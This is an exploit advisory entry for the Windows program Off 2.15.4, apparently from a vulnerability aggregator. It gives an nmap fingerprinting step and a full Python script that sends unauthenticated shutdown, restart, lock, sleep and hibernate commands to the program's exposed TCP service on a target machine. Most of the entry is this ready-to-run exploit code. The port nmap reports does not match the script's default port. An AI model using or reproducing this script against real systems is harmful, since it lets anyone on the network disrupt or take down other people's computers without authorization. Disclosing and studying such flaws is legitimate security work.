📄 Off 2.15.4 Unauthenticated Remote System Control

🗓️ 25 Jun 2025 00:00:00Reported by Chokri HammediType

Off 2.15.4 exposes unauthenticated service for remote shutdown, restart, lock, sleep, and hibernate.

# Exploit Title: Off 2.15.4 - Unauthenticated Remote System Control
    (Shutdown/Restart/Lock/Sleep/Hibernate)
    # Date: 25/06/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.bridgetech.io
    # Software Link: https://www.bridgetech.io/OffWindows_Latest.zip
    # Version: 2.15.4
    # Tested on: Windows 10 (Build 19044)
    
    '''
    Description:
    
    Off 2.15.4 exposes a TCP service that accepts remote commands like
    Shutdown, Restart, Lock, Sleep, and Hibernate without any authentication.
    
    Identification:
    
    nmap -sV --version-intensity 0 -T5 -p- 192.168.8.105
    
    output:
    PORT      STATE SERVICE VERSION
    49746/tcp open  unknown
    1 service unrecognized despite returning data. If you know the
    service/version, please submit the following fingerprint at
    https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port49746-TCP:V=7.94SVN%I=0%D=6/25%Time=685B86E0%P=x86_64-pc-linux-gnu%
    SF:r(NULL,9,"unlocked\n");
    
    should return "unlocked".
    
    '''
    #!/usr/bin/env python3
    
    import socket
    import argparse
    import sys
    
    def control_pc(ip, port, action):
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port))
                s.send(b"Hello\x0a")
                s.recv(1024)
                s.send((action + "\x0a").encode())
                print(f"Sent {action} command")
        except Exception as e:
            print(f"Error: {e}")
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("--lock", action="store_true")
        parser.add_argument("--shutdown", action="store_true")
        parser.add_argument("--restart", action="store_true")
        parser.add_argument("--hibernate", action="store_true")
        parser.add_argument("--sleep", action="store_true")
        parser.add_argument("--ip", default="192.168.8.105")
        parser.add_argument("--port", type=int, default=50055)
    
        args = parser.parse_args()
    
        actions = {
            "Lock": args.lock,
            "Shutdown": args.shutdown,
            "Restart": args.restart,
            "Hibernate": args.hibernate,
            "Sleep": args.sleep
        }
    
        selected = [a for a, v in actions.items() if v]
    
        if len(selected) != 1:
            print("Specify one action")
            sys.exit(1)
    
        control_pc(args.ip, args.port, selected[0])

25 Jun 2025 00:00Current

7.7High risk

Vulners AI Score7.7